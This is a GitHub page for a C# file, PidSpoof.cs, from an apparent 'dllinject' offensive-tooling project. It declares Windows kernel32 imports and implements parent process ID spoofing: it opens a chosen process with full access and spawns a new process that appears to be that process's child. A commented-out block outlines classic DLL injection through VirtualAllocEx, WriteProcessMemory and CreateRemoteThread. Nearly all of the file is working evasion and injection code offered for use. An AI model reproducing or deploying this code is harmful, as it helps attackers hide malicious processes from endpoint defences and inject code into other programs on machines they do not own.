-
Notifications
You must be signed in to change notification settings - Fork 20
Expand file tree
/
Copy pathPidSpoof.cs
More file actions
205 lines (167 loc) · 8.47 KB
/
PidSpoof.cs
File metadata and controls
205 lines (167 loc) · 8.47 KB
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
118
119
120
121
122
123
124
125
126
127
128
129
130
131
132
133
134
135
136
137
138
139
140
141
142
143
144
145
146
147
148
149
150
151
152
153
154
155
156
157
158
159
160
161
162
163
164
165
166
167
168
169
170
171
172
173
174
175
176
177
178
179
180
181
182
183
184
185
186
187
188
189
190
191
192
193
194
195
196
197
198
199
200
201
202
203
204
205
using System;
using System.Reflection;
using System.Runtime.InteropServices;
using System.Text;
namespace dllinject
{
public class PidSpoof
{
[StructLayout(LayoutKind.Sequential)]
public struct PROCESS_INFORMATION
{
public IntPtr hProcess; public IntPtr hThread; public uint dwProcessId; public uint dwThreadId;
}
[StructLayout(LayoutKind.Sequential, CharSet = CharSet.Unicode)]
public struct STARTUPINFOEX
{
public STARTUPINFO StartupInfo; public IntPtr lpAttributeList;
}
[StructLayout(LayoutKind.Sequential)]
public struct SECURITY_ATTRIBUTES
{
public int nLength; public IntPtr lpSecurityDescriptor; public int bInheritHandle;
}
[StructLayout(LayoutKind.Sequential, CharSet = CharSet.Unicode)]
public struct STARTUPINFO
{
public uint cb; public string lpReserved; public string lpDesktop; public string lpTitle; public uint dwX; public uint dwY; public uint dwXSize; public uint dwYSize; public uint dwXCountChars; public uint dwYCountChars; public uint dwFillAttribute; public uint dwFlags; public short wShowWindow; public short cbReserved2; public IntPtr lpReserved2; public IntPtr hStdInput; public IntPtr hStdOutput; public IntPtr hStdError;
}
[Flags]
public enum AllocationType
{
Commit = 0x1000, Reserve = 0x2000, Decommit = 0x4000, Release = 0x8000, Reset = 0x80000, Physical = 0x400000, TopDown = 0x100000, WriteWatch = 0x200000, LargePages = 0x20000000
}
[Flags]
public enum MemoryProtection
{
Execute = 0x10, ExecuteRead = 0x20, ExecuteReadWrite = 0x40, ExecuteWriteCopy = 0x80, NoAccess = 0x01, ReadOnly = 0x02, ReadWrite = 0x04, WriteCopy = 0x08, GuardModifierflag = 0x100, NoCacheModifierflag = 0x200, WriteCombineModifierflag = 0x400
}
public static class Kernel32
{
[DllImport("kernel32.dll", SetLastError = true)]
public static extern IntPtr OpenProcess(
UInt32 processAccess,
bool bInheritHandle,
int processId);
[DllImport("kernel32.dll", SetLastError = true)]
[return: MarshalAs(UnmanagedType.Bool)]
public static extern bool InitializeProcThreadAttributeList(
IntPtr lpAttributeList,
int dwAttributeCount,
int dwFlags,
ref IntPtr lpSize);
[DllImport("kernel32.dll", SetLastError = true)]
[return: MarshalAs(UnmanagedType.Bool)]
public static extern bool UpdateProcThreadAttribute(
IntPtr lpAttributeList,
uint dwFlags,
IntPtr Attribute,
IntPtr lpValue,
int cbSize,
IntPtr lpPreviousValue,
IntPtr lpReturnSize);
[DllImport("kernel32.dll", SetLastError = true)]
public static extern IntPtr GetProcessHeap();
[DllImport("kernel32.dll", SetLastError = false)]
public static extern IntPtr HeapAlloc(IntPtr hHeap, uint dwFlags, UIntPtr dwBytes);
[DllImport("kernel32.dll", SetLastError = true)]
public static extern bool CreateProcess(
string lpApplicationName,
string lpCommandLine,
ref SECURITY_ATTRIBUTES lpProcessAttributes,
ref SECURITY_ATTRIBUTES lpThreadAttributes,
bool bInheritHandles,
uint dwCreationFlags,
IntPtr lpEnvironment,
string lpCurrentDirectory,
[In] ref STARTUPINFOEX lpStartupInfo,
out PROCESS_INFORMATION lpProcessInformation);
[DllImport("kernel32.dll", SetLastError = true)]
public static extern bool CloseHandle(IntPtr hHandle);
[DllImport("kernel32.dll", SetLastError = true, ExactSpelling = true)]
public static extern IntPtr VirtualAllocEx(
IntPtr hProcess,
IntPtr lpAddress,
Int32 dwSize,
uint flAllocationType,
MemoryProtection flProtect);
[DllImport("kernel32.dll", SetLastError = true)]
public static extern bool WriteProcessMemory(
IntPtr hProcess,
IntPtr lpBaseAddress,
byte[] lpBuffer,
Int32 nSize,
out IntPtr lpNumberOfBytesWritten);
[DllImport("kernel32.dll")]
public static extern bool VirtualProtectEx(
IntPtr hProcess,
IntPtr lpAddress,
Int32 dwSize,
uint flNewProtect,
out uint lpflOldProtect);
[DllImport("kernel32.dll")]
public static extern IntPtr CreateRemoteThread(
IntPtr hProcess,
IntPtr lpThreadAttributes,
uint dwStackSize,
IntPtr lpStartAddress,
IntPtr lpParameter,
uint dwCreationFlags,
IntPtr lpThreadId);
[DllImport("kernel32.dll")]
public static extern bool ProcessIdToSessionId(uint dwProcessId, out uint pSessionId);
[DllImport("kernel32.dll")]
public static extern uint GetCurrentProcessId();
[DllImport("kernel32.dll", SetLastError = true)]
public static extern bool DeleteProcThreadAttributeList(IntPtr lpAttributeList);
[DllImport("kernel32.dll")]
public static extern uint GetLastError();
[DllImport("kernel32", CharSet = CharSet.Ansi)]
public static extern IntPtr GetProcAddress(
IntPtr hModule,
string procName);
[DllImport("kernel32.dll", CharSet = CharSet.Auto)]
public static extern IntPtr GetModuleHandle(
string lpModuleName);
}
public bool execute(uint ppid, string spawnto)
{
try
{
uint processSessionId = 0;
uint parentSessionId = 0;
uint currentPid = Kernel32.GetCurrentProcessId();
bool result1 = Kernel32.ProcessIdToSessionId(currentPid, out processSessionId);
bool result2 = Kernel32.ProcessIdToSessionId(ppid, out parentSessionId);
STARTUPINFO sInfo = new STARTUPINFO();
STARTUPINFOEX sInfoEx = new STARTUPINFOEX();
PROCESS_INFORMATION pInfo = new PROCESS_INFORMATION();
SECURITY_ATTRIBUTES secAttr = new SECURITY_ATTRIBUTES();
secAttr.nLength = Marshal.SizeOf(secAttr);
sInfo.cb = (uint)Marshal.SizeOf(sInfoEx);
IntPtr lpSize = IntPtr.Zero;
sInfoEx.StartupInfo = sInfo;
IntPtr hSpoofParent = Kernel32.OpenProcess(0x1fffff, false, (int)ppid);
IntPtr lpValue = IntPtr.Zero;
lpValue = Marshal.AllocHGlobal(IntPtr.Size);
Marshal.WriteIntPtr(lpValue, hSpoofParent);
string currentPath = System.IO.Path.GetDirectoryName(Assembly.GetEntryAssembly().Location);
result1 = Kernel32.InitializeProcThreadAttributeList(IntPtr.Zero, 1, 0, ref lpSize);
sInfoEx.lpAttributeList = Marshal.AllocHGlobal(lpSize);
result1 = Kernel32.InitializeProcThreadAttributeList(sInfoEx.lpAttributeList, 1, 0, ref lpSize);
result1 = Kernel32.UpdateProcThreadAttribute(sInfoEx.lpAttributeList, 0, (IntPtr)0x00020000, lpValue, IntPtr.Size, IntPtr.Zero, IntPtr.Zero);
return Kernel32.CreateProcess(spawnto, string.Empty, ref secAttr, ref secAttr, false, 0x00080010, IntPtr.Zero, currentPath, ref sInfoEx, out pInfo);
}
catch (Exception ex)
{
return false;
}
//incorrect injection to parent process
//IntPtr loadLibAddress = Kernel32.GetProcAddress(Kernel32.GetModuleHandle("kernel32.dll"), "LoadLibraryA");
//IntPtr lpBaseAddress = Kernel32.VirtualAllocEx(pInfo.hProcess, IntPtr.Zero, dllPath.Length, 0x00003000, MemoryProtection.ExecuteReadWrite);
//IntPtr bytesLength = IntPtr.Zero;
//result1 = Kernel32.WriteProcessMemory(pInfo.hProcess, lpBaseAddress, Encoding.ASCII.GetBytes(dllPath), dllPath.Length, out bytesLength);
//IntPtr handle = Kernel32.CreateRemoteThread(pInfo.hProcess, IntPtr.Zero, 0, loadLibAddress, lpBaseAddress, 0, IntPtr.Zero);
}
}
}